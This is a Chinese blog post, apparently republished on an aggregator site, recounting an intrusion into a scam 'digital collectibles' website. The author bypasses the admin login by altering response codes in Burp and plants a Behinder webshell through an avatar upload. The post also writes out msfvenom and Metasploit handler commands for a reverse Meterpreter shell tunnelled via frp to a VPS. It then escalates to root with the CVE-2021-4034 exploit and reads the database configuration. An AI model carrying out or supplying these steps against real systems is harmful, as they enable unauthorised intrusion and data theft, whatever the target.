【网络安全】记一次杀猪盘渗透实战

这篇具有很好参考价值的文章主要介绍了【网络安全】记一次杀猪盘渗透实战。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

看起来非常假的网站,这个网站是没有 cdn 的用的是 thinkphpk 框架搭建的。

【网络安全】记一次杀猪盘渗透实战

先打一波 poc 没有效果

【网络安全】记一次杀猪盘渗透实战

访问一下后台直接在 url 后面加/admin。

【网络安全】记一次杀猪盘渗透实战

一个开源的 cms 还没有验证码尝试用 burp 进行爆破,首先在火狐上设置代理 ip 为 127.0.0.1 代理端口为 8081。

【网络安全】记一次杀猪盘渗透实战

Burp 上也要设置端口为 8081,将 Intercept 设置为 on 输入账号密码点击登录就能拦截到数据包。

【网络安全】记一次杀猪盘渗透实战

【网络安全】记一次杀猪盘渗透实战

在爆破之前先发送到 Repeater 模块发送看看反应。

【网络安全】记一次杀猪盘渗透实战

用户不存在返回 code 为 1 的响应码,尝试拦截返回包把 1 改为 0。

【网络安全】记一次杀猪盘渗透实战

【一一帮助网络安全提升点我一一】
①网络安全学习路线
②20份渗透测试电子书
③安全攻防357页笔记
④50份安全攻防面试指南
⑤安全红队渗透工具包
⑥网络安全必备书籍
⑦100个漏洞实战案例
⑧安全大厂内部视频资源
⑨历年CTF夺旗赛题解析

成功登录后台,这应该是个前端 js 验证非常的不安全。

【网络安全】记一次杀猪盘渗透实战

尝试找上传点,点击用户管理-编辑-上传头像,上传一张 jpg 文件在用 burp 抓包改为 php 将内容改为冰蝎马。

成功上传链接冰蝎马。

【网络安全】记一次杀猪盘渗透实战

想办法上线到 msf 提权,这里就使用 frp 内网穿透,在我的 vps 开启 frp。

在内网上的 kali 进行设置

设置配置文件将 8000 端口的流量转到 kali 的 6666 端口。

启动客户端

./frpc -c frpc.ini

【网络安全】记一次杀猪盘渗透实战

【网络安全】记一次杀猪盘渗透实战

生成 msf 木马 ip 和端口要填 vps 的

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=**** LPORT=8000 -f elf > shell.elf

这里的 lhost 应为服务器地址 LPORT 为反向代理端口,将 shell.elf 上传到/www/wwwroot/目录设置权限为 777。

【网络安全】记一次杀猪盘渗透实战

打开 msf 进行监听

use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 6666
exploit

运行shell.elf

 ./shell.elf

【网络安全】记一次杀猪盘渗透实战

成功返回会话。

【网络安全】记一次杀猪盘渗透实战

使用模块 run post/multi/recon/local_exploit_suggester 进行漏洞查询。

【网络安全】记一次杀猪盘渗透实战

使用 cve-2021-4034 提权,切换到 linux shell 下面然后进到/tmp 目录下下载脚本。

git clone

【网络安全】记一次杀猪盘渗透实战

似乎不行卡住了直接上传上去吧。

upload /home/kali/Desktop/CVE-2021-4034  /tmp/

进入shell

cd /tmp

make

chmod 777 cve-2021-4034

./cve-2021-4034

返回 root 权限。

【网络安全】记一次杀猪盘渗透实战

查看 database.php 文件链接数据库发现基本上也没有人充值,看到一个账号 40w 的就是这家所谓数字藏品公司的老总。

【网络安全】记一次杀猪盘渗透实战

登进入尝试体现均提示账户金额异常看来是跑路了,加了它们的官方群进入一看全是讨钱的

在这里提醒一下各位这种所谓的数字藏品都是骗局根本提不出来钱的。文章来源地址https://www.toymoban.com/news/detail-438000.html

到了这里,关于【网络安全】记一次杀猪盘渗透实战的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 🔥🔥网络之谜:记一次失败排查的故事

    在这篇文章中,我们将详细探讨导致故障的可能原因以及解决方案,以便更好地理解故障排查的复杂性和艰巨性,尤其是当出现与本次故障表现相似的问题时。 首先,让我们回顾一下故障的表现。在客户端调用接口时,发现一直在转圈等待,而服务器端却收到了请求并在返回

    2024年02月05日
    浏览(56)
  • 记一次思科模拟器小型网络搭建练习

    可以实现不同网络之间主机的通信 (若使用交换机实现不同网络之间的主机通讯,则数据包是以广播方式发出,一是没有数据安全性,二是大量广播包会消耗主机资源) 网络互联:主要用于互联局域网和广域网,实现不同网络间互相通信。 数据处理:提供包括分组过滤、分组

    2024年02月09日
    浏览(56)
  • 【PyTorch】记一次卷积神经网络优化过程

    在深度学习的世界中,图像分类任务是一个经典的问题,它涉及到识别给定图像中的对象类别。CIFAR-10数据集是一个常用的基准数据集,包含了10个类别的60000张32x32彩色图像。在上一篇博客中,我们已经探讨如何使用PyTorch框架创建一个简单的卷积神经网络(CNN)来对CIFAR-10数

    2024年01月24日
    浏览(47)
  • 记一次浏览器下载错误处理-失败网络错误

    背景 最近在自己电脑上Chrome浏览器正常使用,但只要是下载软件,就会在下载几十秒后,自动停止,报 失败-网络错误 ,导致文件都下载不成功,如下图。 猜测是更改了哪块的配置,导致一直中断,可以依次检查以下几种方案。 1)检查下载文件目录是否存在 2)检查网络是

    2023年04月16日
    浏览(45)
  • 记一次使用NetworkManager管理Ubuntu网络无效问题分析

    我们都知道CentOS、Redhat系列网络配置比较连贯,要么在 /etc/sysconfig/network-scripts/ifcfg-网络设备名 ,文件中编辑后,重启网络服务;要么使用 nmtui 或者 nmcli 进行配置。但是, Ubuntu变动就比较大: 早期 版本的Ubuntu,配置网络在 /etc/network/interfaces 下,后面这个文件就被遗弃了,

    2024年02月09日
    浏览(46)
  • 记一次修复漏洞(OpenSSH 安全漏洞(CVE-2023-28531))CentOS升级openssh

    1.查看当前openssl和openssh版本 2.安装并启用telnet服务(防止升级过程无法连接机器) 设置开机自启 启动服务 检查服务是否开启: 开启root用户在telnet登陆:   3.配置防火墙(关闭防火墙可不配置) 法一:直接对外开发23端口(高风险)  #--permanent 为永久开启,不加此参数重启

    2024年02月06日
    浏览(49)
  • 网络安全引言(网络安全概述、计算机安全、OSI安全体系、网络安全模型)

    1.1 网络中的“安全”问题 信息安全经历两大变革: 从物理和管理方法 转变成 自动化工具保护信息安全 终端普遍使用 网络传输数据并保证数据安全 网络中的“安全”问题 监听 截获 篡改 假冒 假冒网点 Email截取 否认 1.2 网络安全定义 网络安全是一个跨多门学科的综合性科

    2024年02月19日
    浏览(53)
  • 【网络教程】记一次使用Docker手动搭建BT宝塔面板的全过程(包含问题解决如:宝塔面板无法开启防火墙,ssh,nginx等)

    演示的系统环境: Ubuntu 22.04.3 LTS 更新 安装/升级docker到最新版本 升级docker相关命令如下

    2024年02月10日
    浏览(50)
  • 网络安全与IP安全网络安全

    网络安全 是指网络系统的硬件,软件以及系统中的数据收到的保护。 保护的基本属性为:机密性,身份认证,完整性和可用性; 基本特征:相对性,时效性,相关性,不确定性,复杂性和重要性。 在该方向主要研究如下领域: 入侵者如何攻击网络, 如何防护网络对抗攻击

    2024年02月04日
    浏览(48)
  • 信息安全:网络安全体系 与 网络安全模型.

    网络安全保障是一项复杂的系统工程,是安全策略、多种技术、管理方法和人员安全素质的综合。一般而言,网络安全体系是网络安全保障系统的最高层概念抽象,是由各种网络安全单元按照一定的规则组成的,共同实现网络安全的目标。网络安全体系包括法律法规政策文件

    2024年02月15日
    浏览(55)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包